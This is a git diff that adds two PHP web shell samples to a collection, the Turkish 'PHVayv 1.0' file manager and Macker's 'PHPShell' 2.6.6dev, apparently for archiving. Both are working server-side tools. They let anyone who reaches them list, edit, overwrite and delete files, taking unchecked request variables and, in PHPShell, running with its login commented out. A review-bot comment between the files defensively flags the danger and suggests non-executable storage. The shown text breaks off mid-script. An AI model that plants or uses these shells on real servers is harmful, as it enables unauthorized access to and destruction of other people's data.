inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left" + + + rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br> +<br> +</font></b> + <span class="gensmall"> + <input type="submit" size="16" + name="duzenx1" value="Kaydet" + style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center" + </span><br> +&nbsp;</p> +</form> +</td> + </tr> + <tr> + <td width="100%" bgcolor="#000000" align="center" height="19"> + &nbsp;</td> + </tr> + </table> + + + +<? } else { ?> + + + + + +<?if ($duzenle>"") {; +?> + + + + +<body topmargin="0" leftmargin="0"> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59"> + <tr> + <td width="70" bgcolor="#000000" height="76"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/avlog.gif"></td> + <td width="501" bgcolor="#000000" height="76" valign="top"> + <font face="Verdana" style="font-size: 8pt" color="#B7B7B7"> + <span style="font-weight: 700"> + <br> + AventGrup©<br> + </span>Avrasya Veri ve NetWork Teknolojileri Geli‏tirme Grubu<br> + <span style="font-weight: 700"> + <br> + PHVayv 1.0</span></font></td> + <td width="431" bgcolor="#000000" height="76" valign="top"> + <p align="right"><span style="font-weight: 700"> + <font face="Verdana" color="#858585" style="font-size: 2pt"><br> + </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a href="http://www.aventgrup.net" style="text-decoration: none"> + <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br> + </font></span><font face="Verdana" style="font-size: 8pt" color="#858585"> + <a href="mailto:shopen@aventgrup.net" 
style="text-decoration: none"> + <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td> + </tr> + </table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1"> + <tr> + <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana"> + <span style="font-size: 8pt">&nbsp;اal‎‏‎lan Dosya</span></font></td> + <td bgcolor="#D6D6D6" height="1"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19"> + <tr> + <td width="1" height="19"></td> + <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td> + </tr> + <tr> + <td width="1" height="1"></td> + </tr> + </table> + </td> + </tr> +</table> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1"> + <tr> + <td width="100%" bgcolor="#000000">&nbsp;</td> + </tr> + <tr> + <td width="100%" bgcolor="#9F9F9F"> + <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos"> +<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> + <br> + <textarea name="duzenx" + style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left" + + + rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r'); +while(! 
feof ( $baglan ) ){ +$okunan=fgets($baglan,1024); +echo $okunan; +} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br> +<br> +</font></b> + <span class="gensmall"> + <input type="submit" size="16" + name="duzenx1" value="Kaydet" + style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center" + </span></p> +</form> +</td> + </tr> + <tr> + <td width="100%" bgcolor="#000000"> + &nbsp;</td> + </tr> + </table> + + + + + + + + + + + +<? +} else { +?> + + + +<html> + +<head> +<meta http-equiv="Content-Language" content="tr"> +<meta name="GENERATOR" content="Microsoft FrontPage 5.0"> +<meta name="ProgId" content="FrontPage.Editor.Document"> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> +<title>PHVayv 1.0</title> +</head> + +<body topmargin="0" leftmargin="0"> + +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59"> + <tr> + <td width="70" bgcolor="#000000" height="76"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/avlog.gif"></td> + <td width="501" bgcolor="#000000" height="76" valign="top"> + <font face="Verdana" style="font-size: 8pt" color="#B7B7B7"> + <span style="font-weight: 700"> + <br> + AventGrup©<br> + </span>Avrasya Veri ve NetWork Teknolojileri Geli‏tirme Grubu<br> + <span style="font-weight: 700"> + <br> + PHVayv 1.0</span></font></td> + <td width="431" bgcolor="#000000" height="76" valign="top"> + <p align="right"><span style="font-weight: 700"> + <font face="Verdana" color="#858585" style="font-size: 2pt"><br> + </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a href="http://www.aventgrup.net" style="text-decoration: none"> + <font 
color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br> + </font></span><font face="Verdana" style="font-size: 8pt" color="#858585"> + <a href="mailto:shopen@aventgrup.net" style="text-decoration: none"> + <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td> + </tr> + </table> + + + + <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20"> + <tr> + <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana"> + <span style="font-size: 8pt">&nbsp;اal‎‏‎lan Klasِr</span></font></td> + <td bgcolor="#D6D6D6" height="20"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4"> + <tr> + <td width="1"></td> + <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td> + <td width="65"> + <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13"> + <tr> + <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13" + onmouseover='this.style.background="D9D9D9"' + onmouseout='this.style.background="9F9F9F"' + style="CURSOR: hand" + + + + + > + <p align="center"><font face="Verdana" style="font-size: 8pt"> + + + + + + + <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none"> + <font color="#000000">ـst Klasِr</font></a></font></td> + + </tr> + </table> + </td> + </tr> + </table> + </td> + </tr> + </table> + + + +<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" 
id="AutoNumber3" height="21"> + <tr> + <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td> + </tr> + <tr> + <td bgcolor="#000000" height="20"> + <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19"> + <tr> + <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26"> + <tr> + <td align="center" bgcolor="#5F5F5F" + onmouseover="style.background='#6F6F6F'" + onmouseout="style.background='#5F5F5F'" + style="CURSOR: hand" + + height="19" bordercolor="#000000"> + <span style="font-weight: 700"> + <font face="Verdana" style="font-size: 8pt" color="#9F9F9F"> + <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td> + </tr> + </table> + </td> + <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27"> + <tr> + <td align="center" bgcolor="#5F5F5F" height="19" + onmouseover="style.background='#6F6F6F'" + onmouseout="style.background='#5F5F5F'" + style="CURSOR: hand" + bordercolor="#000000"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F"> + <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none"> + <font color="#9F9F9F">Yeni Klasِr</font></a></font></td> + </tr> + </table> + </td> + <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28"> + <tr> + <td align="center" bgcolor="#5F5F5F" 
height="19" + onmouseover="style.background='#6F6F6F'" + onmouseout="style.background='#5F5F5F'" + style="CURSOR: hand" + bordercolor="#000000"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F"> + <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td> + </tr> + </table> + </td> + </tr> + </table> + </td> + </tr> + </table> + + + + + + + +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17"> + <tr> + <td width="30" height="17" bgcolor="#9F9F9F"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td> + <td height="17" bgcolor="#9F9F9F"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya + Ad‎</font></td> + <td width="122" height="17" bgcolor="#9F9F9F"> + <p align="center"> + <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;ف‏lem</font></td> + </tr> +</table> + +<? +if ($sedat=@opendir($dizin)){ +while (($ekinci=readdir ($sedat))){ +if (is_dir("$dizin/$ekinci")){ +?> + +<? if ($ekinci=="." 
or $ekinci=="..") { +} else { +?> +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17"> + <tr> + <td width="30" height="17" bgcolor="#808080"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td> + <td height="17" bgcolor="#C4C4C4"> + <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td> + <td width="61" height="17" bgcolor="#C4C4C4" align="center"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20"> + <tr> + <td width="100%" bgcolor="#A3A3A3" + onmouseover="this.style.background='#BBBBBB'" + onmouseout="this.style.background='#A3A3A3'" + style="CURSOR: hand" + height="20"> + + <p align="center"><font face="Verdana" style="font-size: 8pt"> + <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none"> + <font color="#000000">Aç</font></a></font></td> + </tr> + </table> + </td> + <td width="60" height="17" bgcolor="#C4C4C4" align="center"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20"> + <tr> + <td width="100%" bgcolor="#A3A3A3" + onmouseover="this.style.background='#BBBBBB'" + onmouseout="this.style.background='#A3A3A3'" + + + style="CURSOR: hand" + height="20"> + + <p align="center"><font face="Verdana" style="font-size: 8pt"> + <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none"> + <font color="#000000">Sil</font></a> + + </font></td> + </tr> + </table> + </td> + </tr> +</table> +<? +} +?> + +<? +}}} +closedir($sedat); +?> + +<? 
+if ($sedat=@opendir($dizin)){ +while (($ekinci=readdir ($sedat))){ +if (is_file("$dizin/$ekinci")){ + +?> + +<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1"> + <tr> + <td width="30" height="1" bgcolor="#B0B0B0"> + <p align="center"> + <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td> + <td height="1" bgcolor="#EAEAEA"> + <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font> + <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( XXX )&nbsp;</font></td> + <td width="61" height="1" bgcolor="#D6D6D6" align="center"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20"> + <tr> + <td width="100%" bgcolor="#D6D6D6" + onmouseover="this.style.background='#ACACAC'" + onmouseout="this.style.background='#D6D6D6'" + style="CURSOR: hand" + height="20"> + + <p align="center"><font face="Verdana" style="font-size: 8pt"> + <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>"> + <font color="#000000">Düzenle</font></a></font></td> + </tr> + </table> + </td> + <td width="60" height="1" bgcolor="#D6D6D6" align="center"> + <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%"> + <tr> + <td width="100%" bgcolor="#D6D6D6" no wrap + onmouseover="this.style.background='#ACACAC'" + onmouseout="this.style.background='#D6D6D6'" + style="CURSOR: hand" + height="20"> + + <p align="center"><font face="Verdana" style="font-size: 8pt"> + <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none"> + <font color="#000000">Sil</font></a></font></td> + </tr> + </table> + </td> + </tr> +</table> 
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+ <tr>
+ <td width="100%" bgcolor="#000000">&nbsp;</td>
+ </tr>
+</table>
+
+ <tr>
+ <td width="100%" bgcolor="#000000">
+ </body></html><? } ?><? } ?><? } ?><? } ?>
\ No newline at end of file
diff --git a/php/PHPshell/PHP Shell/PHP Shell.jpg b/php/PHPshell/PHP Shell/PHP Shell.jpg
new file mode 100644
index 0000000..2dd2eeb
Binary files /dev/null and b/php/PHPshell/PHP Shell/PHP Shell.jpg differ
diff --git a/php/PHPshell/PHP Shell/PHP Shell.php b/php/PHPshell/PHP Shell/PHP Shell.php
new file mode 100644
index 0000000..0b1f12b
--- /dev/null
+++ b/php/PHPshell/PHP Shell/PHP Shell.php
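Review bot: This sample is committed as a directly executable `.php` file with no access check: the first lines of the hunk run `unlink("$dizin/$sildos")`, `rmdir($silklas)` and `fopen($duzkaydet,'w')` on bare variables that are never assigned in the file, so they presumably arrive from the request via register_globals. Anyone who can reach a checkout of this tree through a PHP-enabled web server could delete or overwrite files there, so I would store the sample in a non-executable form (for example renamed to `PH Vayv.php.txt`, or inside an archive) and keep the bytes unchanged for hashing. The pages also load images from `www.aventgrup.net`, which likely discloses the hosting URL to that host through the Referer header; together with the `PHVayv 1.0` title, this is worth recording in a short README next to the sample as a detection hint.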
@@ -0,0 +1,1010 @@ +<?php + +/* +***************************************************************************************** +* PHPSHELL.PHP BY MACKER August 28th 2003 * +***************************************************************************************** +* * +* Welcome to Macker's PHPShell script... * +* This script will allow you to browse webservers etc... * +* Just copy the file to your directory and open it in your Internet Browser. * +* * +* The webserver should support PHP... * +* * +* You can modify the script if you want, but please send me a copy to: * +* DRAZZ01@HOTMAIL.COM * +***************************************************************************************** + +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +!! PLEASE NOTE: You should use this script at own risk, it should do damage to the !! +!! Sites or even the server... You are responsible for your own deeds. !! +!! The admin of your webserver should always know you are using this !! +!! script. !! +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +*/ + + +/*Setting some envirionment variables...*/ + +/* I added this to ensure the script will run correctly... + Please enter the Script's filename in this variable. */ +$SFileName=$PHP_SELF; + +/* uncomment the two following variables if you want to use http + authentication. 
This will password protect your PHPShell */ +//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */ +//$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */ + +error_reporting(0); +$PHPVer=phpversion(); +$isGoodver=(intval($PHPVer[0])>=4); +$scriptTitle = "PHPShell"; +$scriptident = "$scriptTitle by Macker"; + +$urlAdd = ""; +$formAdd = ""; + +function walkArray($array){ + while (list($key, $data) = each($array)) + if (is_array($data)) { walkArray($data); } + else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} +} + +if (isset($_PUT)) walkArray($_PUT); +if (isset($_GET)) walkArray($_GET); +if (isset($_POST)) walkArray($_POST); + + +$pos = strpos($urlAdd, "s=r"); +if (strval($pos) != "") { +$urlAdd= substr($urlAdd, 0, $pos); +} + +$urlAdd .= "&s=r&"; + +if (empty($Pmax)) + $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */ +if (empty($Pidx)) + $Pidx = 0; + +$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); +$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + +$scriptdate = "August 28th 2003"; +$scriptver = "Version 2.6.6dev"; +$LOCAL_IMAGE_DIR = "img"; +$REMOTE_IMAGE_URL = "img"; +$img = array( + "Edit" => "edit.gif", + "Download" => "download.gif", + "Upload" => "upload.gif", + "Delete" => "delete.gif", + "View" => "view.gif", + "Rename" => "rename.gif", + "Move" => "move.gif", + "Copy" => "copy.gif", + "Execute" => "exec.gif" + ); + +while (list($id, $im)=each($img)) + if (file_exists("$LOCAL_IMAGE_DIR/$im")) + $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">"; + else + $img[$id] = "[$id]"; + + + + +/* HTTP AUTHENTICATION */ + + if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || 
$PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { + setcookie("noauth",""); + Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); + Header( "HTTP/1.0 401 Unauthorized"); + echo "Your username or password is incorrect"; + exit ; + + } + +function buildUrl($display, $url) { + global $urlAdd; + $url = $SFileName . "?$urlAdd$url"; + return "<a href=\"$url\">$display</a>"; +} + +function sp($mp) { + for ( $i = 0; $i < $mp; $i++ ) + $ret .= "&nbsp;"; + return $ret; +} + +function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); } + +function Mydeldir($Fdir) { + if (is_dir($Fdir)) { + $Fh=@opendir($Fdir); + while ($Fbuf = readdir($Fh)) + if (($Fbuf != ".") && ($Fbuf != "..")) + Mydeldir("$Fdir/$Fbuf"); + @closedir($Fh); + return rmdir($Fdir); + } else { + return unlink($Fdir); + } +} + + +function arrval ($array) { +list($key, $data) = $array; +return $data; +} + +function formatsize($insize) { + $size = $insize; + $add = "B"; + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "KB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "MB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "GB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "TB"; + } + return "$size $add"; +} + +if ($cmd != "downl") { + ?> + +<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> --> +<HTML> + <HEAD> + <STYLE> + <!-- + A{ text-decoration:none; color:navy; font-size: 12px } + body { font-size: 12px; + font-family: arial, helvetica; + scrollbar-width: 5; + scrollbar-height: 5; + scrollbar-face-color: white; + scrollbar-shadow-color: silver; + scrollbar-highlight-color: white; + scrollbar-3dlight-color:silver; + scrollbar-darkshadow-color: silver; + scrollbar-track-color: white; + scrollbar-arrow-color: black; + } + Table { font-size: 12px; } + TR{ font-size: 12px; } + TD{ font-size: 
12px; + font-family: arial, helvetical; + BORDER-LEFT: black 0px solid; + BORDER-RIGHT: black 0px solid; + BORDER-TOP: black 0px solid; + BORDER-BOTTOM: black 0px solid; + COLOR: black; + } + .border{ BORDER-LEFT: black 1px solid; + BORDER-RIGHT: black 1px solid; + BORDER-TOP: black 1px solid; + BORDER-BOTTOM: black 1px solid; + } + .none { BORDER-LEFT: black 0px solid; + BORDER-RIGHT: black 0px solid; + BORDER-TOP: black 0px solid; + BORDER-BOTTOM: black 0px solid; + } + .inputtext { + background-color: #EFEFEF; + font-family: arial, helvetica; + border: 1px solid #000000; + height: 20; + } + .lighttd { background: #F8F8F8; + } + .darktd { background: #E8E8E8; + } + input { font-family: arial, helvetica; + } + .inputbutton { + background-color: silver; + border: 1px solid #000000; + border-width: 1px; + height: 20; + } + .inputtextarea { + background-color: #EFEFEF; + border: 1px solid #000000; + scrollbar-width: 5; + scrollbar-height: 5; + scrollbar-face-color: #EFEFEF; + scrollbar-shadow-color: silver; + scrollbar-highlight-color: #EFEFEF; + scrollbar-3dlight-color:silver; + scrollbar-darkshadow-color: silver; + scrollbar-track-color: #EFEFEF; + scrollbar-arrow-color: black; + } + .top { BORDER-TOP: black 1px solid; } + .textin { BORDER-LEFT: silver 1px solid; + BORDER-RIGHT: silver 1px solid; + BORDER-TOP: silver 1px solid; + BORDER-BOTTOM: silver 1px solid; + width: 99%; font-size: 12px; font-weight: bold; color: navy; + } + .notop { BORDER-TOP: black 0px solid; } + .bottom { BORDER-BOTTOM: black 1px solid; } + .nobottom { BORDER-BOTTOM: black 0px solid; } + .left { BORDER-LEFT: black 1px solid; } + .noleft { BORDER-LEFT: black 0px solid; } + .right { BORDER-RIGHT: black 1px solid; } + .noright { BORDER-RIGHT: black 0px solid; } + .silver{ BACKGROUND: silver; } + --> + </STYLE> + <TITLE><?php echo $SFileName ?></TITLE> + </HEAD> + <body topmargin="0" leftmargin="0"> + <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; 
height: 100%;"> + <table width=100% height="100%" NOWRAP border="0"> + <tr NOWRAP> + <td width="100%" NOWRAP> + <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center> + <strong> + <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> + </strong> + </center> + </td> + </tr> + </table><br> + + <?php +} + +if ( $cmd=="dir" ) { + $h=@opendir($dir); + if ($h == false) { + echo "<br><font color=\"red\">".sp(3)."\n\n\n\n + COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n + THE SCRIPT WILL RESULT IN AN ERROR!!! + <br><br>".sp(3)."\n + PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR... + <br><br></font>\n\n\n\n"; + } + if (function_exists('realpath')) { + $partdir = realpath($dir); + } + else { + $partdir = $dir; + } + if (strlen($partdir) >= 100) { + $partdir = substr($partdir, -100); + $pos = strpos($partdir, "/"); + if (strval($pos) != "") { + $partdir = "<-- ...".substr($partdir, $pos); + } + $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); + $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); + $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + } + ?> + <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir"> + <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center> + </td> + </tr> + </table> + <br> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td class="border nobottom noright"> + &nbsp;Browsing:&nbsp; + </td> + <td width="100%" class="border nobottom noleft"> + <table width="100%" border="0" cellpadding="1" cellspacing="0"> + <tr> + <td NOWRAP width="99%" align="center"><input type="text" 
name="dir" class="none textin" value="<?php echo $partdir ?>"></td> + <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td> + </tr> + </table> + + </td> + </tr> + </table> + <!-- </form> --> + <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" > + <tr> + <td width="100%" NOWRAP class="silver border"> + &nbsp;Filename&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Actions&nbsp;(Attempt to perform)&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Size&nbsp; + </td> + <td width=1 NOWRAP class="silver border noleft"> + &nbsp;Attributes&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Modification Date&nbsp; + </td> + <tr> + <?php + + + /* <!-- This whole heap of junk is the sorting section... */ + + $dirn = array(); + $filen = array(); + $filesizes = 0; + while ($buf = readdir($h)) { + if (is_dir("$dir/$buf")) + $dirn[] = $buf; + else + $filen[] = $buf; + } + $dirno = count($dirn) + 1; + $fileno = count($filen) + 1; + + function mycmp($a, $b){ + if ($a == $b) return 0; + return (strtolower($a) < strtolower($b)) ? 
-1 : 1; + } + + if (function_exists("usort")) { + usort($dirn, "mycmp"); + usort($filen, "mycmp"); + } + else { + sort ($dirn); + sort ($filen); + } + reset ($dirn); + reset ($filen); + if (function_exists('array_merge')) { + $filelist = array_merge ($dirn, $filen); + } + else { + $filelist = $dirn + $filen; + } + + + if ( count($filelist)-1 > $Pmax ) { + $from = $Pidx * $Pmax; + $to = ($Pidx + 1) * $Pmax-1; + if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) + $to = count($filelist) - 1; + if ($to > count($filelist)-1) + $to = count($filelist)-1; + $Dcontents = array(); + For ($Fi = $from; $Fi <= $to; $Fi++) { + $Dcontents[] = $filelist[$Fi]; + } + + } + else { + $Dcontents = $filelist; + } + + $tdcolors = array("lighttd", "darktd"); + + while (list ($key, $file) = each ($Dcontents)) { + if (!$tdcolor=arrval(each($tdcolors))) { + reset($tdcolors); + $tdcolor = arrval(each($tdcolors)); } + + if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */ + /* <!-- Dirname --> */ + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n"; + /* <!-- Actions --> */ + echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n"; + /* <!-- Rename --> */ + if ( ($file != ".") && ($file != "..") ) + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* <!-- Delete --> */ + if ( ($file != ".") && ($file != "..") ) + echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* <!-- End of Actions --> */ + echo "&nbsp;&nbsp;</center></td>\n"; + /* <!-- Size --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n"; + /* <!-- Attributes --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n"; + echo "<strong>D</strong>"; + if ( @is_readable("$dir/$file") ) { + echo "<strong>R</strong>"; + } + if (function_exists('is_writeable')) { + if ( @is_writeable("$dir/$file") ) { + echo 
"<strong>W</stong>"; + } + } + else { + echo "<strong>(W)</stong>"; + } + if ( @is_executable("$dir/$file") ) { + echo "<Strong>X<strong>"; + } + echo "&nbsp;&nbsp;</td>\n"; + /* <!-- Date --> */ + echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n"; + echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;"; + echo "</td>"; + echo "</tr>\n"; + + } + else { /* <!-- Then it must be a File... --> */ + /* <!-- Filename --> */ + if ( @is_readable("$dir/$file") ) + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n"; + else + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n"; + /* <!-- Actions --> */ + echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n"; + /* <!-- Rename --> */ + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* <!-- Edit --> */ + if ( (@is_writeable("$dir/$file")) && 